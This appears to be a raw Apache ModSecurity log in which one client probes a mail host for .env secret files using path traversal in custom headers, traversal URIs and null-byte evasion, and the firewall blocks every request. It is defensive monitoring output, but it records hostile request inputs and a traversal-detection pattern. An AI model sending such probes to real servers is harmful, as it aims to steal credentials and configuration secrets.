[Tue May 12 05:30:24.273245 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/health"] [unique_id "agKe0Nr1yOh9TvizezifyQAAAEY"]
[Tue May 12 05:30:24.273650 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/health"] [unique_id "agKe0Nr1yOh9TvizezifyQAAAEY"]
[Tue May 12 05:30:25.151909 2026] [security2:error] [pid 1825287:tid 1825319] [client 45.148.10.247:29844] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKezwgpmE1yW0glLdguaQAAAM4"]
[Tue May 12 05:30:25.171220 2026] [security2:error] [pid 1825287:tid 1825319] [client 45.148.10.247:29844] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/api/.env"] [unique_id "agKe0QgpmE1yW0glLdgubgAAAM4"]
[Tue May 12 05:30:25.171409 2026] [security2:error] [pid 1825287:tid 1825319] [client 45.148.10.247:29844] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/api/.env"] [unique_id "agKe0QgpmE1yW0glLdgubgAAAM4"]
[Tue May 12 05:30:25.219506 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.247:29824] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe0M1tk6y7yBJLpJo55gAAAIY"]
[Tue May 12 05:30:25.221783 2026] [core:error] [pid 1825179:tid 1825211] [client 45.148.10.247:29888] AH10244: invalid URI path (/assets../../../../.env)
[Tue May 12 05:30:25.259649 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.247:29824] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/storage/.env"] [unique_id "agKe0c1tk6y7yBJLpJo56wAAAIY"]
[Tue May 12 05:30:25.259863 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.247:29824] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/storage/.env"] [unique_id "agKe0c1tk6y7yBJLpJo56wAAAIY"]
[Tue May 12 05:30:25.420144 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe0Nr1yOh9TvizezifyQAAAEY"]
[Tue May 12 05:30:25.456634 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/health"] [unique_id "agKe0dr1yOh9TvizezifzwAAAEY"]
[Tue May 12 05:30:25.456688 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/health"] [unique_id "agKe0dr1yOh9TvizezifzwAAAEY"]
[Tue May 12 05:30:25.456717 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/health"] [unique_id "agKe0dr1yOh9TvizezifzwAAAEY"]
[Tue May 12 05:30:25.456933 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/health"] [unique_id "agKe0dr1yOh9TvizezifzwAAAEY"]
[Tue May 12 05:30:25.456993 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/health"] [unique_id "agKe0dr1yOh9TvizezifzwAAAEY"]
[Tue May 12 05:30:25.457023 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/health"] [unique_id "agKe0dr1yOh9TvizezifzwAAAEY"]
[Tue May 12 05:30:25.457424 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/health"] [unique_id "agKe0dr1yOh9TvizezifzwAAAEY"]
[Tue May 12 05:30:26.326699 2026] [security2:error] [pid 1825287:tid 1825319] [client 45.148.10.247:29844] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe0QgpmE1yW0glLdgubgAAAM4"]
[Tue May 12 05:30:26.523159 2026] [security2:error] [pid 1825287:tid 1825319] [client 45.148.10.247:29844] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /assets../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/.env.local"] [unique_id "agKe0ggpmE1yW0glLdgudQAAAM4"]
[Tue May 12 05:30:26.523234 2026] [security2:error] [pid 1825287:tid 1825319] [client 45.148.10.247:29844] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env.local"] [unique_id "agKe0ggpmE1yW0glLdgudQAAAM4"]
[Tue May 12 05:30:26.523402 2026] [security2:error] [pid 1825287:tid 1825319] [client 45.148.10.247:29844] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env.local"] [unique_id "agKe0ggpmE1yW0glLdgudQAAAM4"]
[Tue May 12 05:30:26.593059 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.247:29824] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe0c1tk6y7yBJLpJo56wAAAIY"]
[Tue May 12 05:30:26.633448 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.247:29824] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/www/.env"] [unique_id "agKe0s1tk6y7yBJLpJo58QAAAIY"]
[Tue May 12 05:30:26.633644 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.247:29824] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/www/.env"] [unique_id "agKe0s1tk6y7yBJLpJo58QAAAIY"]
[Tue May 12 05:30:26.799023 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe0dr1yOh9TvizezifzwAAAEY"]
[Tue May 12 05:30:26.836200 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/health"] [unique_id "agKe0tr1yOh9Tvizezif0wAAAEY"]
[Tue May 12 05:30:26.836254 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/health"] [unique_id "agKe0tr1yOh9Tvizezif0wAAAEY"]
[Tue May 12 05:30:26.836284 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/health"] [unique_id "agKe0tr1yOh9Tvizezif0wAAAEY"]
[Tue May 12 05:30:26.836491 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/health"] [unique_id "agKe0tr1yOh9Tvizezif0wAAAEY"]
[Tue May 12 05:30:26.836538 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/health"] [unique_id "agKe0tr1yOh9Tvizezif0wAAAEY"]
[Tue May 12 05:30:26.836566 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/health"] [unique_id "agKe0tr1yOh9Tvizezif0wAAAEY"]
[Tue May 12 05:30:26.837007 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/health"] [unique_id "agKe0tr1yOh9Tvizezif0wAAAEY"]
[Tue May 12 05:30:27.325623 2026] [security2:error] [pid 1825287:tid 1825319] [client 45.148.10.247:29844] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe0ggpmE1yW0glLdgudQAAAM4"]
[Tue May 12 05:30:27.369284 2026] [security2:error] [pid 1825287:tid 1825319] [client 45.148.10.247:29844] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /assets../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/.env.production"] [unique_id "agKe0wgpmE1yW0glLdgueQAAAM4"]
[Tue May 12 05:30:27.369358 2026] [security2:error] [pid 1825287:tid 1825319] [client 45.148.10.247:29844] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env.production"] [unique_id "agKe0wgpmE1yW0glLdgueQAAAM4"]
[Tue May 12 05:30:27.369522 2026] [security2:error] [pid 1825287:tid 1825319] [client 45.148.10.247:29844] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env.production"] [unique_id "agKe0wgpmE1yW0glLdgueQAAAM4"]
[Tue May 12 05:30:27.466447 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.247:29824] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe0s1tk6y7yBJLpJo58QAAAIY"]
